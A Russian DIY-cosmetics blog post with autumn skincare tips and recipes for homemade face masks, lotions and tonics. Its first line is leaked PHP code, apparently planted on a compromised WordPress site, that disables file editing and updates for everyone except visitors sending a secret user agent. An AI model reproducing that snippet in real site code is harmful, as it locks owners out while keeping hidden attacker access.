if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Осенний уход за кожей. Рецепты домашней косметики | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Осенний уход за кожей. Рецепты домашней косметики

Осенью кожа нуждается в более тщательном уходе. Он должен состоять из нескольких составляющих: очищение, увлажнение, питание, защита и тонизирование. О рецептах домашней косметики читайте далее

Когда жар­кая пора года сме­ня­ет­ся более про­хлад­ной, кожа нуж­да­ет­ся в более тща­тель­ном ухо­де. Он дол­жен состо­ять из несколь­ких состав­ля­ю­щих: очи­ще­ние, увлаж­не­ние, пита­ние, защи­та и тони­зи­ро­ва­ние. Даль­ше в ста­тье опи­сы­ва­ет­ся, как пра­виль­но защи­тить кожу в осен­ний сезон.

Какой крем выбрать осенью?

Для боль­шей защи­ты необ­хо­ди­мо поль­зо­вать­ся кос­ме­ти­кой в виде кре­ма, кото­рые име­ют помет­ки на упа­ков­ках как «защи­ща­ю­щий» или «вос­ста­нав­ли­ва­ю­щий». Эти спе­ци­аль­ные сред­ства помо­гут уста­но­вить неви­ди­мый защит­ный барьер для кожи.

Сле­ду­ет пом­нить глав­ное пра­ви­ло при выбо­ре кре­ма – чем холод­нее ста­но­вит­ся на ули­це, тем жир­нее дол­жен быть крем. Но все же при выбо­ре нуж­но оттал­ки­вать­ся от типа кожи, ведь все полез­ное толь­ко в меру. Слиш­ком жир­ный крем так­же вре­ден, ведь он при нагре­ва­нии в поме­ще­нии, закры­ва­ет поры, и кис­ло­род не попа­да­ет в кожу.

Рецепты питательных масок своими руками

2Не сто­ит забы­вать о мас­ках, ведь в этот тяже­лый пери­од для кожи, они смо­гут защи­тить ее и насы­тить ее необ­хо­ди­мы­ми вита­ми­на­ми. К при­ме­ру, мож­но при­го­то­вить овся­ную мас­ку. Нуж­но взять 1 ст.л овся­ных хло­пьев и залить 3 ст.л теп­ло­го моло­ка или сли­вок.  После того, как хло­пья набух­нут, их мож­но нано­сить на зону лица и шеи. Мас­ку надо смыть через 20 минут теп­лой водой.

Очень важ­но пита­ние кожи в осен­нюю пору года. Имен­но в этот момент она нуж­да­ет­ся в вита­мине С. Луч­шим спо­со­бом насы­тить орга­низм этим вита­ми­ном, это вне­сти в еже­днев­ный раци­он про­дук­ты, содер­жа­щие его. Наи­бо­лее попу­ляр­ны­ми таки­ми про­дук­та­ми оста­ют­ся цит­ру­со­вые, киви, ябло­ки, зелень, капу­ста и слад­кий перец.

Так­же, све­жие ово­щи, фрук­ты и яго­ды при­го­дят­ся для при­го­тов­ле­ния кос­ме­ти­че­ских масок. Но и тут есть свои нюан­сы, кожа может не очень хоро­шо пере­не­сти их, из-за боль­шо­го содер­жа­ния вита­ми­на С. Не уди­ви­тель­но, если во вре­мя нане­се­ния мас­ки, воз­ник­нет ощу­ще­ние пока­лы­ва­ния или неболь­шо­го жже­ния. Все-таки луч­ше нано­сить на кожу лица фрук­то­во-ягод­ные мас­ки, кото­рые вли­я­ют на нее более щадящее.

Рецепты по уходу за кожей в осенний период

Осе­нью для жир­но­го типа кожи иде­аль­но подой­дет сле­ду­ю­щее сред­ство. Необ­хо­ди­мо взять обыч­ный увлаж­ня­ю­щий крем и доба­вить к нему пару капель настой­ки мяты на спир­ту и натер­то­го огур­ца, ведь дан­ный овощ зна­ме­нит тем, что отлич­но стя­ги­ва­ет поры. При­го­тов­лен­ную смесь сто­ит нане­сти на зону лица и шеи и подер­жать ее око­ло соро­ка минут. После того, как вре­мя истек­ло, мас­ку мож­но смыть теп­лой водой, но толь­ко без исполь­зо­ва­ния мыла.

Для нор­маль­но­го типа кожи или сме­шан­но­го, нуж­но исполь­зо­вать совсем дру­гой рецепт. Для луч­ше­го измель­че­ния луч­ше исполь­зо­вать блен­дер и пере­мо­лоть до состо­я­ния каши­цы ябло­ко, вино­град, гру­шу и капу­сту. Эту смесь сле­ду­ет доба­вить к увлаж­ня­ю­ще­му или пита­тель­но­му кре­му. Все это нане­сти на кожу в обла­сти лица и шеи, не боль­ше чем на 40 минут и после это­го смыть теп­лой водой.

Для сухой кожи наи­бо­лее опти­маль­ным вари­ан­том явля­ет­ся пита­тель­ная смесь. Нуж­но взять обле­пи­ху или цит­ру­со­вые, пере­мо­лоть их и доба­вить в увлаж­ня­ю­щий крем, жела­тель­но очень жир­ный. При­го­тов­лен­ную каши­цу сто­ит нане­сти на область лица и подер­жать на про­тя­же­нии соро­ка минут. По исте­че­нию вре­ме­ни смыть теп­лой водой.

Рецепты очищающих лосьонов

В осен­ний пери­од кожа наи­бо­лее под­вер­же­на вли­я­нию на нее гря­зи, пыли или вет­ра. Поэто­му надо пери­о­ди­че­ски про­во­дить очи­ща­ю­щие про­це­ду­ры кожи лица и в тоже вре­мя тони­зи­ро­вать ее. Вот несколь­ко сове­тов как спра­вить­ся с эти­ми проблемами.

Для нор­маль­но­го и жир­но­го типа кожи подой­дут очи­ща­ю­щие лосьо­ны с алоэ. Сле­ду­ет взять несколь­ко листьев рас­те­ния и выжать из них сок, а затем сме­шать его с 3 лож­ка­ми теп­лой воды. При­го­тов­лен­ной сме­сью лицо про­ти­рать надо утром и вече­ром. Хра­нить такой лосьон толь­ко в холодильнике.

Еще один рецепт с сухи­ми тра­ва­ми. В неболь­шую емкость насы­пать 2 ч.л цвет­ков зве­робоя и сухих лепест­ков крас­ной розы. Все это залить уксу­сом, при­мер­но 100 мл. Сред­ство долж­но отсто­ять­ся в тем­ном поме­ще­нии на про­тя­же­нии 12 дней. Потом домаш­ний лосьон сто­ит про­це­дить через мар­лю, сло­жен­ную в несколь­ко раз.

А вот несколько рецептов тонизирующих масок для лица

222Яблочная маска для лица своими руками

Под­хо­дит исклю­чи­тель­но для сухой кожи. Поло­ви­ну ябло­ка надо нате­реть на мел­кой тер­ке и сме­шать с яич­ным желт­ком. К полу­чен­ной сме­си доба­вить 1 ст.л меда, 1 ч.л аскор­би­но­вой кис­ло­ты и рас­ти­тель­но­го мас­ла. Все тща­тель­но пере­ме­шать и мож­но нано­сить мас­ку на лицо. Подер­жать ее нуж­но 15 минут и смыть про­хлад­ной водой.

Рецепт кабачковой маски для лица

Подой­дет для раз­дра­жен­ной кожи. Очи­щен­ный каба­чок сто­ит про­пу­стить через мясо­руб­ку и пусть 20 минут он посто­ит для выде­ле­ния сока. В эту каши­цу надо вме­шать яич­ный жел­ток. На зара­нее очи­щен­ную кожу лица и шеи мас­ка нано­сит­ся тол­стым сло­ем, на 20 минут. Смыть ее сле­ду­ет холод­ной водой, после чего про­те­реть лицо куби­ком льда.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Лиана Сергеевна

Так мерзну осенью и зимой, что очень захотелось поделиться с вами рецептами домашней косметики, которую можно сделать своими руками! Читайте все мои записи!